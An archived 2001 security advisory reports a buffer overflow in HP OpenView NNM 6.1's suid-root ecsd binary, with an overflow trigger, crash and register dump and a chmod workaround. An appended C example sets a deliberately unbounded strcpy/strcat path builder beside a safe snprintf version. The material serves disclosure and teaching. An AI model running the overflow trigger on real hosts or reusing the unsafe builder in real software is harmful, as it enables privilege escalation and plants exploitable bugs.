OSEC

From: Jonas Eriksson (jesekure.net)
Date: Wed May 23 2001 - 11:00:57 CDT


    HP OpenView NNM v6.1 buffer overflow

    The problem..

    HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd
    located in the /opt/OV/bin/ directory.

    ecsd is not used in NNM, but is shipped and installed suid-root as default.

    Details..

    jeopenview~> uname -a
    SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
    jeopenview~> ls -la /opt/OV/bin/ecsd
    -r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd
    jeopenview~> pwd
    /
    jeopenview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
    Failed to restore engine
    configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
    jeopenview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
    Segmentation fault (core dumped)
    jeopenview~> gdb /opt/OV/bin/ecsd --core=core
    [snip..]
    Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
    [snip..]
    #0 0x28eb8 in main ()
    (gdb) inf reg
    [snip..]
    l1 0x41414141 1094795585
    l2 0x41414141 1094795585
    l3 0x41414141 1094795585
    l4 0x41414141 1094795585
    l5 0x41414141 1094795585
    l6 0x41414141 1094795585
    l7 0x41414141 1094795585
    i0 0x41414141 1094795585
    i1 0x41414141 1094795585
    i2 0x41414141 1094795585
    i3 0x41414141 1094795585
    i4 0x41414141 1094795585
    i5 0x41414141 1094795585
    fp 0x41410028 1094778920
    [snip..]
    (gdb)

    Vendor Status..

    Hewlett-Packard has been contacted. They are currently working on patches
    for this vulnerability.

    Workaround..

    chmod -s /opt/OV/bin/ecsd
    This will remove the setuid bit from /opt/OV/bin/ecsd, therefore if
    someone does exploit this vulnerability, they won't gain higher privileges.

    Regards
    Jonas Eriksson
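An added illustration of the bug class the Details section shows, written for this page and not taken from the post or from HP's ecsd source: a relative name is joined to the working directory in a fixed stack buffer with no length check (the "//AAAA..." output and the 0x41414141 registers above are the symptom), beside a hardened form that lets snprintf report truncation and refuses the argument. The buffer size, function names and cwd-prefix behaviour are assumptions chosen to illustrate, not the real binary's layout.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed reconstruction of the bug class, not HP's code: ecsd prefixes the
 * -restore_config argument with the working directory ("//AAAA...") and crashes
 * at 313 bytes. The buffer size is illustrative, not the real binary's. */
#define CONFIG_PATH_CHARS 312   /* assumed usable characters in the buffer */

/* Vulnerable pattern: argument appended to a fixed stack buffer unchecked, so a
 * long argv element overwrites saved registers (the advisory's 0x41414141). */
void build_config_path_unsafe(char *out, const char *cwd, const char *name)
{
    strcpy(out, cwd);
    strcat(out, "/");
    strcat(out, name);          /* no bound check: kept only for contrast */
}

/* Hardened form: snprintf gets the size and reports the length it needed. */
bool build_config_path_safe(char *out, size_t outlen,
                            const char *cwd, const char *name)
{
    int need = snprintf(out, outlen, "%s/%s", cwd, name);
    if (need < 0 || (size_t)need >= outlen) {
        if (outlen > 0) out[0] = '\0';
        return false;           /* would not fit: refuse instead of crashing */
    }
    return true;
}

/* Hypothetical handler: 0 = path built (lookup would follow), -1 = too long. */
int restore_config(const char *cwd, const char *name)
{
    char path[CONFIG_PATH_CHARS + 1];   /* +1 for the terminating NUL */
    if (!build_config_path_safe(path, sizeof path, cwd, name)) {
        fprintf(stderr, "restore_config: name too long (%zu bytes)\n", strlen(name));
        return -1;
    }
    return 0;
}

/* Mirrors the advisory's perl -e 'print "A"x N' probe against the safe path. */
int restore_config_fill(const char *cwd, char fill, size_t n)
{
    char name[400];             /* constructed probe buffer, larger than any test */
    if (n >= sizeof name) return -1;
    memset(name, fill, n);
    name[n] = '\0';
    return restore_config(cwd, name);
}
```

With pwd "/" the built path is two characters longer than the argument, so the safe handler accepts 310 bytes and rejects 311 and up; the same argument fed to the unsafe builder would run past the buffer.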